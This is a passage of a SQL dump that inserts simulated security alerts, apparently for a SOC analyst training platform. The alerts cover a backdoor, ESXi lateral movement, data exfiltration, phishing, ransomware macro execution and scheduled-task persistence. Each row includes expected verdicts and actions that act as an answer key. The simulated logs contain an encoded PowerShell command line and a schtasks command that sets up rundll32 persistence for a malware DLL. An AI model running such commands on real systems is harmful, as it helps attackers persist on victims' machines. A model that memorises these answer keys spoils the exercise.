Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1574, 'Creation of Persistent Backdoor', 'high', 'System integrity monitoring', 'The attackers installed a persistent backdoor on the compromised system to maintain access even if the primary route is detected and blocked. This action was identified through integrity monitoring, indicating manipulation of system files and unauthorized network communication.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T03:45:27Z\",\"host_ip\":\"192.168.1.103\",\"detected_file\":\"C:\\\\Windows\\\\System32\\\\svcbackdoor.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_account\":\"compromised_user\",\"process_id\":4567,\"action\":\"File creation and execution\",\"source_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"TCP\",\"log_type\":\"System Integrity\",\"alert_trigger\":\"Unusual file creation in critical directory\"}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities and APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known backdoor executable used in multiple attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account shows signs of unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1575, 'Lateral Movement Across VMware ESXi Servers', 'high', 'Network traffic analysis', 'The attackers are utilizing their foothold to move laterally across the network, specifically targeting VMware ESXi servers to expand their access within the virtual environment. This is a sophisticated operation involving advanced techniques.', 'Lateral Movement', 'T1210', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"protocol\":\"TCP\",\"destination_port\":443,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malware_hash\":\"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\",\"username\":\"esxi_admin\",\"filename\":\"vmtools_update.sh\",\"action\":\"login_attempt\",\"status\":\"success\",\"indicator\":\"APT38\"}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT38 IP used in past lateral movement attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local VMware ESXi server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT38 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"esxi_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Privileged account targeted during attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1576, 'Data Exfiltration to External Server', 'critical', 'Data loss prevention (DLP) systems', 'As a final step, the attackers exfiltrated critical data to an external server, preparing to leverage this information in their retro-styled leak site for extortion purposes. The DLP system detected a large volume of sensitive data being transferred to an unknown IP address.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.45\",\"destination_ip\":\"203.0.113.25\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"j.doe\",\"filename\":\"financial_report_2023.xlsx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"data_volume\":\"2GB\",\"alert_trigger\":\"DLP policy violation - Large data transfer to unknown IP\"}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known data exfiltration campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"financial_report_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"File contains sensitive financial information.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malware associated with this hash.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Regular employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1577, 'Phishing Email Detected', 'high', 'Email Security Gateway Logs', 'A spear-phishing email targeting healthcare employees was detected. The email contained a malicious link aiming to harvest credentials and gain unauthorized access to the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:32:45Z\",\"source_ip\":\"203.0.113.50\",\"destination_ip\":\"10.1.2.3\",\"email_subject\":\"Urgent: Verify your account credentials\",\"email_from\":\"security-notice@legithealthcare.com\",\"email_to\":\"jdoe@healthcare-facility.com\",\"attachment\":\"Invoice_2023.pdf\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malicious_url\":\"http://malicious-login.com/verify\",\"detected_by\":\"Email Security Gateway\"}', '2026-03-15 19:15:50', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of healthcare facility.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"security-notice@legithealthcare.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email address used in recent phishing attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-login.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Threat Database\",\"verdict\":\"malicious\",\"details\":\"URL used for credential harvesting.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially malicious PDF files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.600Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1578, 'Malicious Macro Execution', 'critical', 'Endpoint Detection and Response (EDR)', 'A malicious macro was executed in a document attachment, deploying ransomware payload onto the system. This is step 2 in the operation, following credential compromise.', 'Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"macro_execution\",\"device_id\":\"EDR-123456\",\"user\":\"j.doe@company.com\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.55\",\"document_name\":\"Quarterly_Report_Q3.docm\",\"macro_hash\":\"e9f8f88a5c8b9d3b9e6f1e4b7c3d2a1f\",\"ransomware_name\":\"NoEscape\",\"process_id\":4521,\"endpoint\":\"WIN-8PQEKC1ABCD\",\"action\":\"macro_enabled\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\Quarterly_Report_Q3.docm\"}', '2026-03-15 19:15:50', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with ransomware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e9f8f88a5c8b9d3b9e6f1e4b7c3d2a1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NoEscape ransomware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Quarterly_Report_Q3.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAnalysis\",\"verdict\":\"suspicious\",\"details\":\"Document file with macro execution log.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1579, 'Persistence via Scheduled Task', 'high', 'Windows Event Logs', 'NoEscape ransomware has set up a scheduled task to maintain persistence across system reboots, ensuring the malware remains active and undetected for long-term access.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"EventID\":4698,\"ProviderName\":\"Microsoft-Windows-TaskScheduler\",\"LogName\":\"Security\",\"RecordID\":1184523,\"TaskName\":\"\\\\Microsoft\\\\Windows\\\\NoEscape\\\\DailyCheck\",\"TaskContent\":\"schtasks.exe /create /tn \\\\Microsoft\\\\Windows\\\\NoEscape\\\\DailyCheck /tr \\\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Users\\\\Public\\\\Documents\\\\malware.dll,Execute\\\" /sc daily /st 14:00\",\"User\":\"SYSTEM\",\"Computer\":\"compromised-host.local\",\"IPAddress\":\"10.0.5.23\",\"Hash\":\"5d41402abc4b2a76b9719d911017c592\",\"ExternalAttackerIP\":\"203.0.113.45\"}', '2026-03-15 19:15:50', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known NoEscape ransomware DLL.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"LogName\\\":\\\"Security\\\",\\\"RecordID\\\":1184523,\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck\\\",\\\"TaskContent\\\":\\\"schtasks.exe /create /tn \\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\malware.dll,Execute\\\\\\\" /sc daily /st 14:00\\\",\\\"User\\\":\\\"SYSTEM\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"IPAddress\\\":\\\"10.0.5.23\\\",\\\"Hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"ExternalAttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"LogName\\\":\\\"Security\\\",\\\"RecordID\\\":1184523,\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck\\\",\\\"TaskContent\\\":\\\"schtasks.exe /create /tn \\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\malware.dll,Execute\\\\\\\" /sc daily /st 14:00\\\",\\\"User\\\":\\\"SYSTEM\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"IPAddress\\\":\\\"10.0.5.23\\\",\\\"Hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"ExternalAttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"LogName\\\":\\\"Security\\\",\\\"RecordID\\\":1184523,\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck\\\",\\\"TaskContent\\\":\\\"schtasks.exe /create /tn \\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\malware.dll,Execute\\\\\\\" /sc daily /st 14:00\\\",\\\"User\\\":\\\"SYSTEM\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"IPAddress\\\":\\\"10.0.5.23\\\",\\\"Hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"ExternalAttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"LogName\\\":\\\"Security\\\",\\\"RecordID\\\":1184523,\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck\\\",\\\"TaskContent\\\":\\\"schtasks.exe /create /tn \\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\NoEscape\\\\\\\\DailyCheck /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\malware.dll,Execute\\\\\\\" /sc daily /st 